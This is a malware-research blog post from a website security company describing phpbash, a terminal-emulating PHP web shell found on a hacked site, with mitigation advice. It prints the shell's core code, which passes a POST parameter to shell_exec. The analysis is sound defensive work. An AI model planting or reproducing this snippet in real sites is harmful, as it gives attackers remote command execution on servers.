• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
CLI CSS

phpbash – A Terminal Emulator Web Shell

September 16, 2020Luke Leal

10
SHARES
FacebookTwitterSubscribe

It’s common for hackers to utilize post-compromise tools that contain a graphical user interface (GUI) that can be loaded in the web browser. A GUI generally makes the tool easier to use — and certainly more visually appealing than just raw text.

One example of web malware that uses GUIs are PHP webshells like r57.

r57.php file manager GUI
r57.php file manager GUI

Instead of the hacker manually submitting crafted GET/POST requests to the r57 PHP file, they can simply load the GUI file manager to modify directories or files with one of its many functions.

phpbash – A Terminal Emulator

Our team recently found a tool, pb.php (phpbash), left behind by a hacker on a compromised website. The tool is a hybrid model, incorporating elements from both the traditional GUI and TUI (text user interface). As its name suggests, the tool is used to emulate a bash terminal in a web browser when the pb.php file is loaded. To provide this emulation, a small HTML GUI is generated by the PHP script which tries to replicate the look and feel of a bash terminal.

An emulated bash command prompt used to make it easier to run commands via a PHP file
An emulated bash command prompt used to make it easier to run commands via a PHP file

Functionality

The bash commands are run by using the PHP function shell_exec (note: some hosts have this function disabled) to execute bash commands that are submitted via a POST request whenever the user presses Enter in the browser-emulated command line interface.

/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
    foreach ($output as $line) {
        echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
    }
    die();
}

PHP code used to run the bash command stored in the cmd parameter of the POST request

This type of tool can be useful to an attacker. It lets them have access to a lot of commands which they don’t have to store in the tool file’s coding, since the tool just passes the command to the web server. This means that an attacker’s malicious PHP file doesn’t need to contain much PHP code, making it easier to evade signature based detection.

Here is an example of how an attacker can run commands to quickly deploy a phishing kit downloaded from a third-party server:

It just takes a couple of commands, wget and tar, to download and deploy a phishing kit
It just takes a couple of commands, wget and tar, to download and deploy a phishing kit

Mitigation

You can harden the security of your hosting environment by disabling PHP functions like system and shell_exec through the php.ini file, but be sure to confirm that they are not being used by your existing scripts as it will cause them to stop working. Our web application firewall can also prevent hackers from using these types of tools by blocking their requests.

10
SHARES
FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Hacked Websites

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

2019 Threat Report

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.